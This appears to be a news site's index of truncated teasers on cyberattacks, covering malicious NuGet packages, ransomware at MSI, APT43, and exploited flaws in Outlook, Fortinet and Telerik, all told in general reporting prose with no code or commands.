Cryptocurrency Stealer Malware Found in 13 Malicious NuGet Packages
Experts in cybersecurity have uncovered the mechanics behind a cryptocurrency stealer malware distributed through 13 malignant NuGet packages. This supply chain attack targeted .NET developers and employed a sophisticated typosquatting campaign. Impersonating legitimate packages, the attackers executed PowerShell code to obtain a secondary binary from a pre-programmed server. The two-stage assault led to the deployment of a
- Published in News
Attack on Taiwanese PC manufacturer MSI resulted in a ransomware attack
MSI, the Taiwanese PC company, has officially confirmed that it was the victim of a cyber attack on its systems. The company promptly initiated incident response and recovery measures after detecting network anomalies and alerted law enforcement agencies. However, MSI did not disclose any specifics about the attack or whether any proprietary information, including source
- Published in News
Arid Viper Hacking Group Utilizes Enhanced Rorschach Ransomware in Middle East Cyber Attacks
cybersecurity experts have unveiled a previously unknown and highly sophisticated ransomware variant, Rorschach, which is both advanced and swift. Rorschach ransomware distinguishes itself from other strains with its exceptional customization and unique technical features not previously seen in ransomware, according to a report by Check Point Research. In fact, Rorschach is considered one of the
- Published in News
WordPress Elementor Pro Vulnerability Exploited by Hackers
Actively exploited by unidentified cybercriminals, a recently patched security vulnerability is found within the WordPress Elementor Pro website builder plugin. Affecting versions 3.11.6 and earlier, this broken access control flaw was resolved by the plugin developers in the 3.11.7 version, released on March 22. In the release notes, the Tel Aviv-based company mentioned, “Improved code security enforcement
- Published in News
North Korean APT43 Cyber Group Targets Strategic Intelligence and Financial Gains
A newly identified North Korean cyber group, APT43, has been linked to multiple campaigns aimed at gathering strategic intelligence in line with Pyongyang’s geopolitical interests since 2018. Tracked by Google-owned Mandiant, APT43’s objectives include both espionage and financial motives, employing methods such as credential harvesting and social engineering to achieve its goals. APT43 attempts to generate
- Published in News
Microsoft Shares Guidance on Detecting Outlook Vulnerability Exploited by Russian Hackers
On Friday, Microsoft provided insights to assist users in identifying indicators of compromise (IoCs) linked to a recently patched Outlook vulnerability. Known as CVE-2023-23397 (CVSS score: 9.8), this critical vulnerability involves a privilege escalation issue that could be exploited to steal NT Lan Manager (NTLM) hashes and execute a relay attack without any user interaction. According to Microsoft’s advisory,
- Published in News
Linux SSH Servers Targeted in ShellBot Malware Campaign
A new campaign targeting poorly managed Linux SSH servers has been identified, deploying various strains of malware called ShellBot. The AhnLab Security Emergency Response Center (ASEC) reported that ShellBot, also known as PerlBot, is a DDoS bot malware developed in Perl, which typically uses the IRC protocol for communication with its C&C server. According to
- Published in News
The Chinese hackers exploited a zero-day vulnerability in Fortinet to espionage
Mandiant, the threat intelligence firm, has linked the zero-day exploitation of a medium-severity security flaw in the Fortinet FortiOS operating system to a suspected Chinese hacking group. The attack is part of a broader campaign to deploy backdoors onto Fortinet and VMware solutions and maintain persistent access to victim environments. Mandiant is tracking the malicious
- Published in News
A 3-year-old vulnerability has been exploited by multiple hacker groups to breach U.S. government agencies
Recently, a critical security flaw in Progress Telerik was exploited by multiple threat actors, including a nation-state group, to gain unauthorized access to an unnamed federal entity in the U.S. The Cybersecurity and Infrastructure Security Agency (CISA), Federal Bureau of Investigation (FBI), and Multi-State Information Sharing and Analysis Center (MS-ISAC) jointly issued an advisory, revealing
- Published in News
Fake ChatGPT Chrome extensions hijack Facebook accounts to display malicious ads
A malicious Chrome browser extension branded as ChatGPT has been discovered to hijack Facebook accounts and create rogue admin accounts. This highlights one of the different methods cyber criminals are using to distribute malware. Guardio Labs researcher Nati Tal warns that by hijacking high-profile Facebook business accounts, the threat actor creates an army of Facebook
- Published in News